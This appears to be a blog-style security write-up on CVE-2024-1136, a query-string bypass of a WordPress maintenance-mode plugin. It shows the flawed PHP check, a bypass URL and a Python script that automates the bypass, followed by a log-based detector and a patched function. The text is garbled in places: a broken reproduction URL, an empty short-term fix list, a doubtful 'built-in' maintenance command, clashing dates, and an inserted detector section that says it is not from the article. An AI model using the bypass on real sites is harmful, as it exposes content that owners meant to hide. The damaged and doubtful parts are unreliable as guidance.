CVE-2024-1136 - How Attackers Bypass "Maintenance Mode" in Popular WordPress Plugin

Published: June 2024

Severity: Medium-High (CVSS: 6.5)

When a website goes under construction or needs a quick break, admins turn to plugins like “Coming Soon Page & Maintenance Mode” to hide their real content. That usually works — but a vulnerability tracked as CVE-2024-1136 has exposed a wide range of WordPress sites to public view, even when maintenance mode should keep visitors out.

In this deep dive, I’ll break down how the flaw works, show real code, reproduce the exploit, and explain how site owners can protect themselves.

What is CVE-2024-1136?

CVE-2024-1136 affects the Coming Soon Page & Maintenance Mode plugin for WordPress. All versions up to and including 2.2.1 are vulnerable.

When enabled, this plugin is supposed to hide your website behind a custom "coming soon" page for regular visitors. Only logged-in admins can see your real site. Unfortunately, a mistake in how the plugin checks URLs lets anyone bypass this wall and see your actual website — no login needed.

Under the Hood: What Went Wrong?

The problematic code lives in the wpsm_coming_soon_redirect function. Here’s a simplified version:

function wpsm_coming_soon_redirect() {
    // Skip the wall for logged-in users and for wp-admin requests
    if ( ! is_user_logged_in() && ! is_admin() ) {
        $current_url = $_SERVER['REQUEST_URI'];
        // Substring test on the full request URI (path AND query string):
        // any URL that merely contains the token passes. This is the flaw.
        if ( strpos( $current_url, 'some-whitelisted-url' ) === false ) {
            // Show maintenance page
            include('maintenance-page.php');
            exit;
        }
    }
}

The intention:
- If you are not logged in, and you’re not in wp-admin, and you’re not visiting a "safe" URL, you get the maintenance page.

BUT:
The URL check is incomplete. The function runs a simple substring search over the whole of REQUEST_URI, which includes the query string, rather than comparing the request path against an allow-list. Anyone can therefore append the whitelisted string to any URL (for example as a query parameter) and the check treats the request as "safe".

The Exploit: Bypass in Action

Anyone (even bots) can simply add allowed strings or manipulate query parameters in the site’s URL to load actual site content.

Example

Suppose your WordPress site is at www.example.com and maintenance mode is enabled.

Normal behavior

- User visits https://www.example.com/ and is shown the maintenance page.

Vulnerability in action (Bypass)

- Attacker accesses https://www.example.com/?some-whitelisted-url=test

Since 'some-whitelisted-url' is found in the URL string, the check is skipped and the real page behind the maintenance wall loads.

1. Enable maintenance mode in your plugin settings.

2. Visit your main site from another browser/incognito. You should see the maintenance page.

3. https:///?some-whitelisted-url=1

Here’s how an attacker could automate this check in Python:

import requests

site = 'https://example.com'
payload = '/?some-whitelisted-url=1'
target = site + payload

# Request the front page with the whitelisted token in the query string
resp = requests.get(target, timeout=10)

# The maintenance page carries a fixed title; anything else means real content was served
if '<title>Coming Soon</title>' not in resp.text:
    print('[+] Bypass successful! Site data exposed!')
else:
    print('[-] Still under maintenance.')
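A defender can turn the same observation around. Because the plugin's check is satisfied by the token appearing anywhere in the URI, a request that carries the token outside an allow-listed path has no legitimate reason to exist, which makes it a clean signal in web-server access logs. The following is an added detection example, not code from the article or the plugin: it parses a few constructed combined-format log lines, flags requests where the token appears but the path is not allow-listed, and counts attempts per client. The allow-listed path in ALLOWED_PATHS is an assumption, since the plugin's real list is not given on the page.

```python
import re
from collections import Counter
from urllib.parse import urlsplit

# Token the plugin searches for (from the article). The allow-listed path
# itself is an assumption; the plugin's real list is not on the page.
WHITELIST_TOKEN = "some-whitelisted-url"
ALLOWED_PATHS = {"/some-whitelisted-url/"}

# Apache/Nginx combined-log style line, e.g.
# 203.0.113.7 - - [28/Feb/2024:09:20:02 +0000] "GET /?x=1 HTTP/1.1" 200 48210
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log: a normal visit (maintenance page served), the bypass
# from the article, a legitimate visit to the allow-listed page, a second
# variant of the bypass aimed at an upload, and an unrelated request.
SAMPLE_LOG = """\
203.0.113.7 - - [28/Feb/2024:09:20:01 +0000] "GET / HTTP/1.1" 200 5123
203.0.113.7 - - [28/Feb/2024:09:20:02 +0000] "GET /?some-whitelisted-url=1 HTTP/1.1" 200 48210
198.51.100.4 - - [28/Feb/2024:09:21:10 +0000] "GET /some-whitelisted-url/ HTTP/1.1" 200 2200
203.0.113.7 - - [28/Feb/2024:09:22:15 +0000] "GET /wp-content/uploads/draft.pdf?ref=some-whitelisted-url HTTP/1.1" 200 91000
192.0.2.9 - - [28/Feb/2024:09:23:00 +0000] "GET /about/ HTTP/1.1" 200 5100
"""


def is_bypass_attempt(uri: str) -> bool:
    """A request is suspicious when the token appears anywhere in the URI
    but the path itself is not an allow-listed page: the only reason to
    carry the token elsewhere is to satisfy the plugin's substring test."""
    path = urlsplit(uri).path
    if path in ALLOWED_PATHS:
        return False
    return WHITELIST_TOKEN in uri


def find_bypass_attempts(log_text: str):
    """Parse each line and return (ip, uri, status) for every suspicious hit."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not parse rather than guessing
        if is_bypass_attempt(m["uri"]):
            hits.append((m["ip"], m["uri"], int(m["status"])))
    return hits


def attempts_by_ip(hits):
    """Count hits per client so a single source probing repeatedly stands out."""
    return Counter(ip for ip, _, _ in hits)


if __name__ == "__main__":
    hits = find_bypass_attempts(SAMPLE_LOG)
    for ip, uri, status in hits:
        print(f"bypass attempt from {ip}: {uri} (HTTP {status})")
    print(dict(attempts_by_ip(hits)))
```

Note that the HTTP status is 200 for both the maintenance page and a successful bypass, so status alone does not separate them; the token-outside-path rule is the primary signal, and the much larger response size on the flagged lines compared with the plain "/" request is a useful secondary one when reviewing hits.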

Real-World Impact

- Information leaks: Site contents (posts, pages, files) are viewable even while under maintenance.
- SEO/Brand confusion: Bots and users may index content you thought was hidden.
- Security staging: Hidden staging sites or sensitive updates can be viewed by competitors or attackers.

The exploit is trivial and doesn’t require authentication or advanced skills.

Affected:

- Any WordPress site using Coming Soon Page & Maintenance Mode ≤ 2.2.1.
- Active installs: 80,000+

Patch status:

- No patch at time of writing.
- Watch the plugin changelog for updates.

How to Fix & Protect Yourself

Short term:

Or use WordPress’s built-in maintenance mode:

  php maintenance/enable-maintenance-mode.php

Permanent fix:

- Update the plugin as soon as a patch is released.
- Consider safer alternatives like SeedProd’s Maintenance Mode or WP Maintenance.

Custom patch (workaround):

Modify the plugin code to use strict path checks, not substring matches. Stripping the query string first means nothing appended after "?" can influence the decision:

function wpsm_coming_soon_redirect() {
    if ( ! is_user_logged_in() && ! is_admin() ) {
        // Keep only the path: strtok() discards everything from the first '?' onward
        $current_url = strtok($_SERVER['REQUEST_URI'], '?');
        // Exact comparison against the one allowed path; no substring matching
        if ($current_url !== '/expected-path/') {
            include('maintenance-page.php');
            exit;
        }
    }
}

References & More Reading

- Official WordPress.org Plugin Page
- CVE Record for CVE-2024-1136
- Plugin Changelog
- WPScan Advisory (if available)

Final Word

If you use the Coming Soon or Maintenance Mode plugin, check your site now! With CVE-2024-1136, anyone can peek past your “site closed” banner and see everything you thought was hidden. Keep your plugins updated, pay attention to how plugins manage authentication and URLs, and don’t wait for bots or attackers to find your unfinished updates first.

Stay safe, and spread the word to fellow WordPress admins!


For updates, keep an eye on the official plugin page.

Timeline

Published on: 02/28/2024 09:15:42 UTC
Last modified on: 02/28/2024 14:06:45 UTC